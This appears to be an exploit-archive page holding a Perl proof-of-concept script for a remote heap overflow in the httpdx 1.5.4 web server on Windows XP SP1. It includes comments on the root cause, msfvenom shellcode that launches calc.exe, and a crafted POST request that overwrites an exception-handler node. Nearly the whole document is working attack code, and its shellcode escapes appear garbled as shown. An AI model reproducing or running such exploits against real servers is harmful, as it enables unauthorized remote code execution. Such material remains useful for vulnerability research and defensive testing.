Home / exploits httpdx 1.5.4 Heap Overflow
Posted on 30 July 2012
#!/usr/bin/perl -w #====================================================================== # Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow # Date: 28 July 2012 # Exploit Author: st3n [at sign] funoverip [dot] net # Vendor Homepage: http://httpdx.sourceforge.net # Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download # Version: 1.5.4 # Tested on: WinXP SP1 #====================================================================== # Additional notes: # ----------------- # # - During a POST request, httpdx allocates memory with malloc(size+1), # where 'size' is actually the value of "Content-Length" HTTP header.. # All post-data will then be copied into this area using strncpy(x,y,size2), # where 'size2' = "request length" - "header length" (and not Content-Length) # # - As httpdx use it own handler function upon crash, this exploit overwrite # the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode. # # - The exploit works very often, but not always. In both case, httpdx crash # after the exploit. # # - WinXP SP1 # 0x77ED73B4 --> UnhandledExceptionFilter() #====================================================================== use strict; use IO::Socket::INET; # target my $host = "127.0.0.1"; # The [perl|php|py|..] page to call during the POST request. # The page must exists and the extension must be defined in the directive # "http.handlers = {...}" in httpdx.conf my $page = "/test.pl"; # Windows XP - SP1 - English # --------------------------- # ptr to the first _VECTORED_EXCEPTION_NODE structure = 0x77fc3210 - 4 my $veh_node_addr = 0x77fc320c ; # pointer to out shellcode => 0x00227664 - 8 = 0x0022765c my $sc_ptr = 0x0022765c; # shellcode # (msfvenom -p windows/exec -f perl CMD=calc.exe) my $shellcode = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52" . "x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26" . "x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d" . "x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0" . "x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" . "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff" . "x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d" . "xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b" . "x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44" . "x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b" . "x12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68" . "x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95" . "xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb" . "x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2e" . "x65x78x65x00"; # flush after every write $| = 1; my $sock = IO::Socket::INET->new("$host:80"); print $sock "POST $page HTTP/1.0 " . "Content-Length: 1023 " . "Content-Type: text " . "Host: $host" . " " . " " . # shellcode $shellcode . # nops "x90" x (1032-length($shellcode)) . # VEH addr pack('V', $veh_node_addr) . # ptr to shellcode pack('V', $sc_ptr) ; # if any ... while(<$sock>){ print $_; } exit;
